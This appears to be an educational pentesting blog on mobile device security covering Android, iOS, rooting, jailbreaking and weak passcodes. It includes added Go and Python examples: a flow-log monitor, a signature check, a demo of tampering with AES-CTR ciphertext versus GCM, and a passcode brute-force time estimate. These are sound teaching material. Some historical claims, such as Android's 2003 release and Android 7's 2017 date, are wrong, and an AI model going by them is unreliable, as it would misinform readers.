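As an added example (not part of the original post), the following Go program implements the monitoring step just described for an isolated IoT segment: a policy naming the segment, the internal ranges it must never reach and the few services it legitimately needs, run over a constructed flow log. The log format, the addresses and the policy values are all assumptions made for this example.

```go
package main

import (
	"fmt"
	"net"
	"strconv"
	"strings"
)

// Flow is one parsed connection record from the IoT segment's flow log.
type Flow struct {
	Src, Dst net.IP
	DstPort  int
	Proto    string
}

// Policy describes what devices on the isolated IoT segment may reach.
type Policy struct {
	Segment   *net.IPNet      // the IoT VLAN itself
	Protected []*net.IPNet    // internal ranges IoT devices must never reach
	Allowed   map[string]bool // "dst:port/proto" services the devices need
}

func mustCIDR(s string) *net.IPNet {
	_, n, err := net.ParseCIDR(s)
	if err != nil {
		panic(err)
	}
	return n
}

// DefaultPolicy is the constructed policy for this example: IoT devices live in
// 10.30.0.0/24, may use the segment's resolver and one vendor cloud endpoint, and
// must never reach the office or server LANs. All addresses are assumed values.
func DefaultPolicy() Policy {
	return Policy{
		Segment:   mustCIDR("10.30.0.0/24"),
		Protected: []*net.IPNet{mustCIDR("10.10.0.0/16"), mustCIDR("10.20.0.0/24")},
		Allowed:   map[string]bool{"10.30.0.1:53/udp": true, "203.0.113.10:443/tcp": true}, // resolver, vendor cloud
	}
}

// ParseFlow reads one constructed log line: "<timestamp> <src> -> <dst>:<port>/<proto>".
func ParseFlow(line string) (Flow, error) {
	fields := strings.Fields(line)
	if len(fields) != 4 || fields[2] != "->" || strings.Count(fields[3], "/") != 1 {
		return Flow{}, fmt.Errorf("malformed record: %q", line)
	}
	hp := strings.SplitN(fields[3], "/", 2)
	host, portStr, err := net.SplitHostPort(hp[0])
	port, perr := strconv.Atoi(portStr)
	src, dst := net.ParseIP(fields[1]), net.ParseIP(host)
	if err != nil || perr != nil || src == nil || dst == nil {
		return Flow{}, fmt.Errorf("bad address or port in %q", line)
	}
	return Flow{Src: src, Dst: dst, DstPort: port, Proto: strings.ToLower(hp[1])}, nil
}

// Check returns ("", false) for out-of-scope or permitted flows, else the violation.
func (p Policy) Check(f Flow) (string, bool) {
	if !p.Segment.Contains(f.Src) {
		return "", false // not an IoT device; another monitor's job
	}
	for _, n := range p.Protected {
		if n.Contains(f.Dst) {
			return "IoT device reached protected segment " + n.String(), true
		}
	}
	if !p.Allowed[fmt.Sprintf("%s:%d/%s", f.Dst, f.DstPort, f.Proto)] {
		return "destination not in IoT allowlist", true
	}
	return "", false
}

// AuditLog maps each offending log line to its reason; unparseable records are reported too.
func AuditLog(p Policy, lines []string) map[string]string {
	alerts := map[string]string{}
	for _, line := range lines {
		f, err := ParseFlow(line)
		if err != nil {
			alerts[line] = err.Error()
			continue
		}
		if reason, bad := p.Check(f); bad {
			alerts[line] = reason
		}
	}
	return alerts
}

// SampleLog is a constructed flow log, not captured from a real network.
var SampleLog = []string{
	"2024-05-01T10:00:01Z 10.30.0.12 -> 203.0.113.10:443/tcp", // permitted vendor cloud
	"2024-05-01T10:00:05Z 10.30.0.12 -> 10.30.0.1:53/udp",     // permitted local DNS
	"2024-05-01T10:01:12Z 10.30.0.25 -> 10.10.0.5:445/tcp",    // IoT host reaching office SMB
	"2024-05-01T10:02:40Z 10.30.0.25 -> 198.51.100.7:23/tcp",  // telnet to an unknown host
	"2024-05-01T10:03:00Z 10.10.0.5 -> 203.0.113.10:443/tcp",  // office host, out of scope
	"2024-05-01T10:04:00Z 10.30.0.30 -> not-a-flow",           // malformed record
}
```

Running `AuditLog(DefaultPolicy(), SampleLog)` flags the SMB flow into the office LAN, the telnet flow to an unknown host, and the malformed record, while the two permitted flows and the office host's own traffic produce nothing.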
Dealing with Mobile Device Security
In today’s connected world, the average person possesses at least four mobile devices. In fact, some individuals use their smartphone to replace traditional platforms. This is possible because mobile devices in the past few years have increased in power, capability, and flexibility.
There is an increasingly diverse range of devices deserving of the “mobile” moniker besides smartphones, though. They include fitness trackers, smart watches, and even virtual-reality devices.
People rely on these devices to give them information about the world around them, and the devices allow for the recording and tracking of vast sums of data that were just not possible to gather and record in the past.
Because this data is being collected for mobile devices, stored on mobile devices, and even being uploaded to a cloud system, attackers have increasingly turned their attention to mobile devices and their information.
As a pentester, you need to know how mobile devices function and the issues they introduce to the workplace or any other environment they exist within. The reality is that mobile devices will continue to appear in ever-increasing numbers and will need to be considered by any competent pentester.
In this blog, you’ll learn to:
Recognize what constitutes a mobile device
Understand the features to expect from a mobile device
Recognize the security issues specific to the mobile platforms
Recognizing Current-Generation Mobile Devices
Mobile devices have evolved dramatically over the past decade. Gone are the days of bulky, underpowered, and underdelivering devices. The forerunner of the current mobile device, the T-Mobile Sidekick, debuted in 2002 in the United States.
This device, while underpowered and with limited features compared to today’s smartphones, represented the beginning of the contemporary style of mobile devices that have had such a huge impact on the world today.
The mobile devices that appeared over the next several years up to the current day started with the introduction of smartphones from manufacturers such as Samsung, Nokia, and Ericsson as well as many others.
Though the available devices increased in power and capability over the years, it took Apple in 2007 to debut its popular iPhone to bring the mobile market to the masses.
It also accelerated the development of more advanced smartphones in different forms from the many vendors that exist today. From 2007 through 2016, Apple has sold millions of iPhones worldwide to an eager public looking to adopt the latest technology.
Since then, many other vendors have released their own spin on the smartphone paradigm, which has resulted in not only different types of hardware but different operating systems in the form of Android, BlackBerry, and even Windows Mobile.
In addition to smartphones, a popular tablet market exists. Before 2000, tablets were bulky and underpowered compared to what we would consider a useful tablet today. It wasn’t until 2010, with the introduction of the iPad from Apple, that the public started to embrace the technology as a whole.
The iPad showed that a tablet could be very small and lightweight, have a decent battery life, and have a broad range of features that didn’t exist in previous models and forms.
As smartphones and tablets evolved, so did the operating systems that powered and ran these devices along the way. In particular, Google’s Android operating system has evolved dramatically and continues to do so.
The open source nature of the Android operating system allows developers to fine-tune and tweak as well as enhance the operating system to run on other devices, including wearable devices, heads-up displays, and even cable boxes, just to name a few.
Mobile OS Versions and Models
One of the biggest issues that has arisen with the adoption of mobile devices has been the security of data, especially when the devices are used in the workplace. The vendors that manufacture the devices and their operating systems have found many ways to deal with security issues while still retaining usable and functional devices.
Techniques such as encryption, permissions, and different forms of authentication have all been integrated and adopted by device manufacturers, with differing degrees of success along the way.
Vendors have had to work out what the proper balance is between security and the usability of a device. An environment can be made more secure, but that security tends to result in a device that is a little less easy to use.
On the flipside, a device that is easier to use tends to do so by sacrificing some level of security along the way.
For example, a device that wishes to use encryption to protect its data will typically require the user to implement passwords and other features on the device that will require users to enter a set of credentials before they can use the device.
Since most users find this to be an annoyance, they may choose to forgo passwords as well as encryption in order to be able to pick up their device and use it immediately. Of course, choosing this option will result in the device being less secure than it would be otherwise.
Making the situation more complex is the race between vendors to add more features and capabilities to give themselves an edge over their competitors. As the list of features in these mobile devices has grown over the years, so has the tendency to favor convenience features over security, or at least to not make security an emphasis.
In the current mobile device market, four mobile operating systems are available for the consumer to choose from when selecting a device. These four major operating systems are Google’s Android, Apple’s iOS, BlackBerry, and Microsoft’s Windows Mobile.
Of these four operating systems, the two that are the most widely used and encountered are Google’s Android and Apple’s iOS. Apple’s iOS is found on Apple devices exclusively and is thus customized and tweaked for that manufacturer’s own environment.
In the case of Android, we have a system that is ready to customize and tweak to essentially any type of environment given the knowledge and time to do so. Of these two, Google’s Android is the leading mobile OS in the marketplace.
BlackBerry and Windows Mobile will not be discussed in this blog because they are less popular. The likelihood of encountering these devices is quite low given the overall number of devices in the marketplace.
Threats to Mobile Devices
When looking at these two mobile operating systems, you will notice some similarities between them, at least in concept if not in implementation. The types of threats that a mobile device will encounter are the same even if the device that encounters them is different.
With this in mind, it’s important to take a look at some of these issues so that you can understand the goals the developers had in mind when doing their job.
Some of the most basic security concerns on mobile devices involve the following:
Malware This is an area that is not unknown to anyone who uses a computing device nowadays because it is so common to encounter malware and its mischief. Malware is known to cause monetary damages in the form of lost productivity, stolen information, and other cybercrimes of varying forms along the way. Borrowing from the lessons that have been learned from the traditional desktop market, developers of mobile systems sought to secure their systems and harden them against the threat of malware.
Resource and Service Availability Abuse The intentional use or misuse of resources on any given device or environment has been a long-standing issue in the traditional technology market and is one that has continued on to the mobile device market as well.
A misbehaving application or poorly designed piece of software can easily render the hardware or software ineffective or unstable and thus not desirable to the consumer.
In addition, running misbehaving software on a mobile device can mean that what few resources are available are quickly exhausted; in some cases the battery itself can be drained rapidly, rendering the whole device an expensive paperweight until it can be recharged.
Malicious and Unintentional Data Loss If there’s anything that malware has taught us, it’s that malicious data loss is definitely a problem in the form of identity theft or other appropriation of information.
Additionally, the loss of information via carelessness or misuse of a device by the consumer is a very real issue and thus developers took steps to ensure that data was safeguarded against both malicious and accidental loss.
Of course, there are many more types of threats and issues that a mobile device can and will encounter, but to keep things simple we will focus on these key areas.
However, it is safe to say that many of the issues that you may have encountered in your own experience, or even the ones encountered and discussed in this blog, are ones that can easily be moved over to a mobile environment and cause problems for the consumer of these devices.
Goals of Mobile Security
When vendors design a device, they have many goals in mind in terms of features and capabilities as well as other areas. All these goals are taken into account in order to make their device better as well as differentiate it from those of their competitors.
While we won’t worry too much about usability features, we will focus on the security features and what may motivate developers to include such security features on their devices where applicable.
Keep in mind at the highest level of this discussion that the overall goal is to protect the security of a consumer’s data and minimize the risk of threats and vulnerabilities on any given device. The vendors’ approaches to this have varied dramatically in many cases, but the overall goals have remained the same.
So, what are the security goals of most mobile device vendors? There are five areas where effective security measures need to be developed for any given mobile device. Not all mobile devices address all five of these concerns, but the more of these points that are addressed, the more secure the device.
Let’s dive right in and talk about these five points a little bit and then apply them later when we review the different system architectures in both Android and iOS.
The first area that a device manufacturer will attempt to address in order to make a more secure mobile device is that of access control.
Access control on a mobile device in concept is similar to the way it would be on a regular operating system or a server operating system, meaning that access is granted or denied based on a series of permissions and rules that describe what level of access is in place for any specific group or individual.
When properly implemented, access control can strictly regulate interaction with any system resource: applications, items of data, hardware, and other components of a system.
In practice, access control should strive to be in a default state where no individual or group can perform any action unless they are explicitly or implicitly granted the ability to do so, resulting in a stronger system overall.
The next area that vendors try to address, and have been addressing over the past 15 years in various operating systems in many different forms, is that of digital signing. Digital signing is a process where an item such as software can be validated as having come from a certain source and therefore is authentic.
This is an absolutely invaluable feature to have on modern operating systems and platforms because it can ensure that software or other items that come from a third party are indeed authentic and have not been altered, hopefully meaning that the chance of compromising the security or stability of the system is minimized.
In practice, digital signing has done precisely this for software; many applications are signed by the developer of the application, which provides a means of asserting the origin and authenticity of software.
It is also used to sign device drivers in modern operating systems to ensure that a device driver comes from a valid source and is not something a third party may have created and is trying to get installed on your system so they can potentially cause harm.
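Added example, not from the original post: how a device-side signature check of the kind just described behaves in practice, using Ed25519 from Go’s standard library. The package layout, the name com.example.app and the payload bytes are constructed; the point is that the genuine package verifies while a tampered payload, a relabeled version string and a package signed by an unknown key all fail.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// Package models an installable app bundle: the bytes a device will install,
// the identity it claims, and a detached signature from its publisher.
type Package struct {
	Name, Version string
	Payload       []byte
	Signature     []byte
}

// digest binds name, version and payload together with length framing, so
// that none of them can be swapped independently under an old signature.
func digest(name, version string, payload []byte) []byte {
	h := sha256.New()
	fmt.Fprintf(h, "%d:%s|%d:%s|%d:", len(name), name, len(version), version, len(payload))
	h.Write(payload)
	return h.Sum(nil)
}

// Publisher holds the private key, which stays with the software vendor.
type Publisher struct {
	priv ed25519.PrivateKey
	pub  ed25519.PublicKey
}

func NewPublisher() (*Publisher, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Publisher{priv: priv, pub: pub}, nil
}

// PublicKey is the part shipped with the device or pinned by the app store.
func (p *Publisher) PublicKey() ed25519.PublicKey { return p.pub }

// Sign produces a package whose signature covers name, version and payload.
func (p *Publisher) Sign(name, version string, payload []byte) Package {
	return Package{Name: name, Version: version, Payload: payload,
		Signature: ed25519.Sign(p.priv, digest(name, version, payload))}
}

// Verify is the device-side check: recompute the digest from what actually
// arrived and test the signature against the trusted publisher key only.
func Verify(trusted ed25519.PublicKey, pkg Package) error {
	if len(trusted) != ed25519.PublicKeySize || len(pkg.Signature) != ed25519.SignatureSize {
		return fmt.Errorf("%s: malformed key or signature", pkg.Name)
	}
	if !ed25519.Verify(trusted, digest(pkg.Name, pkg.Version, pkg.Payload), pkg.Signature) {
		return fmt.Errorf("%s %s: signature not from trusted publisher", pkg.Name, pkg.Version)
	}
	return nil
}

// Outcome records which of four presented packages the device accepted.
type Outcome struct {
	Genuine   bool // vendor-signed, untouched
	Tampered  bool // payload altered after signing
	Relabeled bool // old signature reused on a different version string
	WrongKey  bool // valid signature, but from an unknown publisher
}

// Scenario signs a constructed package and then presents the device with the
// genuine copy and three altered ones. Only Genuine should come back true.
func Scenario() (Outcome, error) {
	vendor, err := NewPublisher()
	if err != nil {
		return Outcome{}, err
	}
	imposter, err := NewPublisher()
	if err != nil {
		return Outcome{}, err
	}
	payload := []byte("constructed app binary, not a real APK")
	pkg := vendor.Sign("com.example.app", "1.2.0", payload)
	tampered := pkg
	tampered.Payload = append([]byte(nil), payload...)
	tampered.Payload[0] ^= 0x01 // one flipped bit in the binary
	relabeled := pkg
	relabeled.Version = "1.1.0" // downgrade attempt reusing the 1.2.0 signature
	forged := imposter.Sign(pkg.Name, pkg.Version, payload)
	trusted := vendor.PublicKey()
	return Outcome{
		Genuine:   Verify(trusted, pkg) == nil,
		Tampered:  Verify(trusted, tampered) == nil,
		Relabeled: Verify(trusted, relabeled) == nil,
		WrongKey:  Verify(trusted, forged) == nil,
	}, nil
}
```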
A critical component of mobile devices has been that of device encryption. Encryption is a mechanism that you can use to protect data from being disclosed to those who do not have the authorization to view it. Encryption also ensures that data has not been altered by a party not authorized to do so.
While encryption is not designed to prevent a device from getting stolen or being searched by a third party, it provides a safeguard against anyone who is not the owner of the device from viewing data and potentially getting access to secrets that they shouldn’t have access to in the first place.
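Added example (not from the original post) on the integrity point above: the alteration detection comes specifically from an authenticated mode such as AES-GCM, so the program below contrasts AES-GCM, which rejects an edited record, with unauthenticated AES-CTR, which silently decrypts the edit. The record "grant=0", the key handling and the edit are constructed for illustration.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"io"
)

const gcmNonceSize = 12 // nonce length used by cipher.NewGCM

// SealGCM encrypts with AES-256-GCM, prepending the nonce; the appended tag is what lets OpenGCM detect edits.
func SealGCM(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return aead.Seal(nonce, nonce, plaintext, nil), nil
}

// OpenGCM decrypts and verifies in one step; any changed byte yields an error, not plaintext.
func OpenGCM(key, sealed []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(sealed) < aead.NonceSize() {
		return nil, errors.New("record too short")
	}
	return aead.Open(nil, sealed[:aead.NonceSize()], sealed[aead.NonceSize():], nil)
}

// EncryptCTR is plain AES-CTR: confidentiality only, no integrity. Shown for contrast, not recommended.
func EncryptCTR(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, aes.BlockSize+len(plaintext))
	if _, err := io.ReadFull(rand.Reader, out[:aes.BlockSize]); err != nil {
		return nil, err
	}
	cipher.NewCTR(block, out[:aes.BlockSize]).XORKeyStream(out[aes.BlockSize:], plaintext)
	return out, nil
}

// DecryptCTR is the inverse; it cannot tell untouched ciphertext from edited ciphertext.
func DecryptCTR(key, data []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(data) < aes.BlockSize {
		return nil, errors.New("record too short")
	}
	out := make([]byte, len(data)-aes.BlockSize)
	cipher.NewCTR(block, data[:aes.BlockSize]).XORKeyStream(out, data[aes.BlockSize:])
	return out, nil
}

// Outcome reports how each construction reacted to the same edit.
type Outcome struct {
	GCMRejected bool   // OpenGCM returned an error
	CTRRejected bool   // DecryptCTR returned an error (it never does)
	CTROutput   string // what DecryptCTR handed back after the edit
}

// Compare stores the constructed record "grant=0" under both constructions, then, without the
// key, XORs the ciphertext byte under the '0' with '0'^'1'. CTR yields "grant=1"; GCM refuses.
func Compare() (Outcome, error) {
	key := make([]byte, 32) // a real device would derive this from the passcode and hardware secrets
	record := []byte("grant=0")
	pos := len(record) - 1 // offset of the '0' inside the plaintext
	if _, err := io.ReadFull(rand.Reader, key); err != nil {
		return Outcome{}, err
	}
	sealed, err := SealGCM(key, record)
	if err != nil {
		return Outcome{}, err
	}
	ct, err := EncryptCTR(key, record)
	if err != nil {
		return Outcome{}, err
	}
	sealed[gcmNonceSize+pos] ^= '0' ^ '1' // the edit, made without knowing the key
	ct[aes.BlockSize+pos] ^= '0' ^ '1'    // the same edit against the CTR record
	_, gcmErr := OpenGCM(key, sealed)
	pt, ctrErr := DecryptCTR(key, ct)
	return Outcome{GCMRejected: gcmErr != nil, CTRRejected: ctrErr != nil, CTROutput: string(pt)}, nil
}
```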
It’s also worth mentioning that encryption in mobile devices can be a legal issue; some industries have legal regulations placed upon them, and the same regulations could require certain types and levels of encryption are put in place as part of normal security measures.
Isolation has also proven to be an important and significant part of device security over the last handful of years because it can dramatically improve the stability of a device and the security of various processes on a system.
Isolation works by limiting access to any one application or process to any other application or resource to preserve the stability and other elements on a system. In some ways, isolation is a form of access control, but this type of access control doesn’t apply to human beings as much as it applies to applications that are running on any given system.
Finally, one really important area of device security is the use of permissions to provide granular access to system resources. By using a permission-based model, you can implement a system where only the actions needed by a user to perform a specific task are granted.
Nothing else is granted to avoid providing too much access to users and potentially risking the stability and security of the device itself.
Again, while these may not be all the areas that device manufacturers might strive to protect when developing their device and their operating system model, they do represent some of the key areas that almost all vendors have to take into consideration.
Working with Android OS
The first mobile OS we will address is Google’s Android operating system. This operating system is coming up on its 15th birthday in 2018; it was originally developed and released in 2003 by a company called Android Inc.
Android Inc. didn’t stay independent for too long, and it was later purchased by Google with the idea that the brainpower that developed Android would come to work for Google and help improve the OS for the new range of Nexus and Android-powered devices that Google was endorsing and supporting to be released on the market.
When the operating system was first envisioned, the idea was to have an operating system that was open source, secure, stable, flexible, and easy for third parties to develop applications for.
From its first release up to the current day, the Android OS has met these goals to varying degrees and has become the leading OS on mobile devices of all types.
Consumers flock to the Android OS because it is feature-rich, powerful, and free.
Another attractive feature of this OS is that it is based quite heavily on the Linux operating system (with Security-Enhanced Linux Kernel [SELinux]), so for those who are familiar with Linux on other platforms, these skills and knowledge can be moved quite easily over to this new mobile environment.
Over the last decade, Android has evolved substantially to include support for an even greater number of devices and just about every major service of any consequence online, such as file sharing services, cloud services, social networking, and even third-party authentication services. Android 7 is scheduled to be released in 2017.
So, how does Android deal with the five essential points that a secure mobile operating system should be able to deliver? Android scores quite high compared to iOS; it is able to offer support in the form of numerous features for all five of the key areas whereas the iOS systems do not.
Now, does this really mean the Android system is more secure than iOS? All it means is that the Android OS supports the five areas discussed in this blog, and thus, in this context, we have a potentially more secure operating system than its competitor.
Boosting the security of the Android OS just a little bit further is the fact that developers and consumers both have their own ways of interacting with the system, with one being more secure than the other. Android was developed with the consumer market in mind, and thus the interface presented is simple for a first-time user.
However, developers can enable special modes on the system and secret menus on the system that will allow them to perform actions that the regular users of the system will not see. Because the developer tools are hidden from a regular user, users avoid causing harm to the system itself.
Rooting on Android
What about when a regular user decides that they want to do more with the system than the restrictions in place on the device will allow? Well, this involves a process known as rooting, which is designed to increase the level of access to any user to an extreme degree.
After rooting is completed, the user of a system has nearly unlimited access to anything in the system they want to interact with, with essentially no restrictions.
While this may sound like a good idea, it is definitely not a good idea for most because the average user can very quickly get themselves in trouble by attempting something on a system that would normally trigger an alert or just block their actions.
When rooting is in place, the user will no longer get the volume of warnings or blockages that they did before. They could harm the system itself without any warning.
What exactly is rooting in the context of an Android device? Well, the simplest explanation is that rooting involves running a process or script on an Android device, and if the execution of this application works as planned, the device is unlocked and rooted, meaning that the user, or whoever has the device, is able to do whatever they want whenever they want.
It is because of the power unleashed by rooting a device that the process should only be undertaken by those who are experienced and knowledgeable enough to avoid negatively impacting the security of a device.
Fortunately, the process of rooting is not the easiest process to undertake. It requires some research and some effort to perform in the first place. The amount of effort and knowledge required to root the device will vary depending on the device in question, however.
It is also important to note that improperly or incorrectly rooting a device can not only have a negative impact on security but also result in a device that is completely inoperable or “bricked” in some cases.
Playing in a Sandbox
The design of Android is not that much different from that of other operating systems. While it is true that Android is made up of a collection of processes and components just like other operating systems, there are differences in how they are implemented within the device and the operating system itself.
Android uses a design called a sandbox that emphasizes the isolation of components and processes. Each component that runs within the Android environment is designed to be as self-contained as possible and only communicate with each other in very specific means using specific processes to control and limit how the interactions can occur.
The result of this design is that processes and components are strictly controlled and isolated except in cases where they specifically have a reason to communicate; even then the communication is controlled in order to prevent potential security and stability issues.
While we won’t get into the hard-core technical details of how this is done—that is something for the developer to research—it is worthwhile to mention that isolation and to a certain degree, access control is built right in this system at the process level.
In terms of access control and limiting access to not just data but components on the system itself, let’s take a moment to discuss the kernel of the Android operating system.
The kernel of an operating system represents the “heart” of the whole system and is responsible for scheduling resources, controlling input-output, as well as controlling other essential components and resources on the system. In the case of Android, this is no different.
In an Android system the kernel, for all intents and purposes, is the only piece of the system that gets root access and is, therefore, able to perform any operation or function that it needs to.
The result of this design is that the kernel is able to do whatever it needs to in order to keep the system running and functioning properly, which is exactly what you would want; limiting the access of such an essential part of the system would keep it from working properly.
Of course, anything that is not specifically the kernel will run with some lesser degree of access depending on a specific function and role within the framework of the system.
Let’s talk about some other components of the Android operating system just briefly:
Application Runtime (ART) One of the components of the Android operating system that was introduced in version 5 (and has since been part of all later versions) is the Android application runtime (ART). This component was implemented to replace the older Dalvik runtime present in previous versions of the operating system.
Essentially what this component does is allow applications to run in a virtual machine environment within Android. This is not an unusual situation for those who are familiar with the Java environment, which uses a similar strategy for running applications within its system.
As a matter of fact, most Android applications are written in the Java language, which many people are familiar with from using applications on the web or other situations.
Google Play A major benefit of the Android operating system is that whatever isn’t present in the operating system as it ships from the manufacturer can be added later on.
The default, and preferred, way to add applications within the Android operating system is to use the popular Google Play service, which is a store where users can download applications for free or for a minor fee and install them into the operating system.
The user no longer has to keep backup copies of media or store the apps on a USB device; they can simply use a Google account, associate the applications with that account, and then download them as needed—for example, if they move to a new device or have to reset their current device.
Over-the-Air (OTA) Update Another huge benefit of the Android operating system is the ability to provide updates. Updates are an essential part of any operating environment; they are how security deficiencies and other problems are addressed. Android updates can be anything from a minor download all the way up to an update for the whole operating system.
Android updates are delivered using what is known as an over-the-air (OTA) strategy, meaning they are downloaded over the network using a wireless capability such as Wi-Fi.
Because updates by default are delivered automatically (or the user is prompted to download and install them), it tends to be much more likely that a device will be kept up-to-date than in previous operating systems.
During its lifetime Android has proven to be a flexible, powerful, and highly customizable operating system that operates effectively cross-platform.
Building a Custom Droid
The Android operating system that is provided by default from Google has proven to be adept at providing a good experience for the user. However, Android is not going to address the needs of most pentesters because it does not have enough of the system accessible or available to allow for effective testing.
So, as a pentester, you will typically have to do a few more things to make the system usable for your particular needs. To do this, there are some options available to you for customizing the system.
The first option is to take the stock operating system that ships with the device and then root it. Since this process opens up the system and allows anything to be done with the device, it means that you will be able to perform more actions and even install apps on the system that wouldn’t run without root access.
This is a fairly straightforward option to employ; however, it still means that you must seek out your own tools to perform the pentesting process, which is going to be a challenge in most cases because there are so many.
Second, you could resort to an off-the-shelf option in the form of a preconfigured operating system such as Kali Linux NetHunter. This operating system is the cousin of the well-known Kali operating system, which is also used for pentesting, but on non-mobile environments.
To install this operating system, all a potential user has to do is go to the Kali Linux website (Penetration Testing and Ethical Hacking Linux Distribution) and download the installation utility.
On Windows, this is a wizard that users click through to answer some questions; then with the device plugged into the desktop or laptop via USB, they only need to hit Finish and let the wizard install and configure the device with their new operating system.
Additionally, a huge benefit with this option is that over 1,000 tools ship with the OS by default, meaning that a proven portfolio of tools is available and ready to use without having to invest large amounts of time searching for useful or functional tools.
Of course, there are other operating systems that can also be used for pentesting and that are security minded, but they are too numerous to list within this blog.
However, if you are curious about different options as far as Android-based pentesting distributions, a Google search can yield lots of results so that you can do your homework and see which is suitable for your use.
Working with Apple iOS
The second most popular mobile operating system available today is Apple’s iOS system.
iOS has proven to be popular because it is easy to use, learn, and navigate by anyone who wishes to pick up a device and start using it. iOS, much like Android, is able to be run on both tablets in the form of Apple’s own iPad as well as the iPhone.
But no other devices outside of the Apple environment will run this operating system (which is not like Android, even though it shares similar heritage through its basis on Unix).
Unlike Android, which is able to address all of the five points that were mentioned earlier, Apple’s iOS is only able to cover four of the core points for a secure mobile operating system as defined previously.
Apple’s iOS is able to provide some form of protection and control in the following areas:
Access control, such as passwords, account lockout, and even permissions
Digital signing of applications, which means that applications installed through sources such as Apple’s own store have been verified and vetted to ensure that they are of quality and come from an authentic source
Application of encryption, which means that applications can communicate using encrypted traffic and that data stored on the device can be encrypted as well
Isolation, which is a core element of iOS just as it is with Android; processes and applications are restricted as to how they can communicate with one another, thus reducing the chances of stability and security problems in general
Something that is worthwhile to point out is that, unlike Android, Apple’s iOS is set up and designed to only allow applications that originate from Apple’s own store to be installed on a device.
As far as security and quality go, this ensures that only safe and stable applications make their way onto a device, and anything that doesn’t meet the standards or hasn’t been vetted through Apple’s own process of validation will not get installed.
But you’ve probably run into someone at some point who’s had applications running on their own device that don’t originate from Apple’s own store. So where do these applications originate from, and how do they get installed on a device that should not allow them to be installed by design? This is known as jailbreaking.
Jailbreaking Apple’s iOS
In a nutshell, jailbreaking is the equivalent of rooting, except that it is performed on an Apple iOS-based device.
When a device undergoes the jailbreaking process, it allows that specific device to lift the limitations on running non-Apple-approved applications and other types of software, thereby allowing the device owner to install whatever they want from wherever they got it.
In practice, this is an attractive option for many device owners because it eliminates these barriers and allows them to take full control of their device.
Of course, much like on Android, this does present a problem because it becomes entirely possible for applications that don’t come from Apple’s own store to be installed, and therefore security or stability can be compromised.
Thus, jailbreaking should be attempted only by those who
Understand the risks of jailbreaking a device
Know how to keep themselves out of trouble when they install unvalidated software
Are aware of the implications of performing certain actions
And, as a footnote to the story, jailbreaking, much like rooting, is the quickest way to void a warranty, so this is another point to keep in mind when undertaking either of these operations.
Finding Security Holes in Mobile Devices
Mobile devices are convenient, but they also introduce their own set of security holes that can also be exploited by a pentester. Like many security problems, many can be avoided with a good dose of common sense and due care.
Risks incurred by installing software from unknown or unverified sources can be limited by doing research about what is being installed.
Also, installing software such as antimalware is helpful because it can blunt the risks associated with getting malware such as viruses, worms, spyware, and other nastiness on a system.
So what are some other problems that present themselves as risks to the mobile platform that can be exploited as well as mitigated, depending on whether you are a pentester or a device owner? Let’s look at a few that present themselves as obvious issues.
Cracking Mobile Passwords
The protection offered by passwords is something that is well documented and well understood in the computing and technology industry. However, there are still many cases where passwords are created improperly, meaning that they are too short, don’t use the full range of characters, or violate other complexity requirements.
In the mobile environment, another problem presents itself: more often than not, there is no password on the device at all. Many users of mobile devices are still in the habit of not setting one up; they see it as an unnecessary obstacle to picking up the device, swiping a finger or tapping a button, and getting straight to work.
The perception is that being able to use the device right away, rather than taking a moment to tap in a password, is a good trade-off. What amplifies the danger is that a lost or stolen device with no password can be accessed without any challenge whatsoever.
Considering how easy a mobile device is to lose, this is a huge risk.
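To make the trade-off concrete, here is a small model of the attacker the text describes: someone who has picked up a lost device and is guessing its passcode. This is an added example, not code from the book or from any vendor; the guess rate, the lockout schedule, and the minimum length are constructed assumptions, and the functions (keyspace, seconds_to_exhaust, weaknesses) are hypothetical names. It shows how a missing passcode, a short passcode, and a single-class passcode each collapse the search space, and how much a lockout helps the short case.

```python
"""Added example: what passcode length and character set actually buy you.

Models an attacker who has picked up a lost device and is guessing its
passcode. A short numeric PIN is exhausted in minutes; the same attack against
a mixed-class passphrase is hopeless even without rate limiting. The guess
rate and lockout schedule are constructed assumptions, not any vendor's
real policy.
"""
import string

# Character classes a passcode can draw from.
CHARSETS = [
    ("digits", set(string.digits)),
    ("lower", set(string.ascii_lowercase)),
    ("upper", set(string.ascii_uppercase)),
    ("symbols", set(string.punctuation)),
]


def classes_used(passcode):
    """Names of the character classes the passcode actually uses."""
    return [name for name, cs in CHARSETS if any(c in cs for c in passcode)]


def keyspace(passcode):
    """Number of candidates an attacker must consider, assuming they know
    the length and which character classes were used."""
    if not passcode:
        return 1  # no passcode at all: the device opens on the first try
    used = classes_used(passcode)
    alphabet = sum(len(cs) for name, cs in CHARSETS if name in used)
    return alphabet ** len(passcode)


def seconds_to_exhaust(passcode, guesses_per_second=10.0, lockout=None):
    """Worst-case time to try every candidate.

    guesses_per_second: assumed rate of a robotic tapper on the lock screen.
    lockout: optional (attempts_before_lock, delay_seconds) pair modelling a
    device that pauses after N consecutive failures (constructed schedule).
    """
    n = keyspace(passcode)
    total = n / guesses_per_second
    if lockout:
        attempts, delay = lockout
        total += (n // attempts) * delay
    return total


def weaknesses(passcode, min_len=6):
    """The problems the text describes: no passcode, too short, one class."""
    if not passcode:
        return ["no passcode set"]
    issues = []
    if len(passcode) < min_len:
        issues.append("too short")
    if len(classes_used(passcode)) < 2:
        issues.append("single character class")
    return issues


if __name__ == "__main__":
    for pc in ["", "1234", "123456", "Tr0ub4dor!"]:
        print(repr(pc), keyspace(pc), weaknesses(pc),
              "%.0f s without lockout" % seconds_to_exhaust(pc),
              "%.0f s with a 5-try/60 s lockout" % seconds_to_exhaust(pc, lockout=(5, 60)))
```

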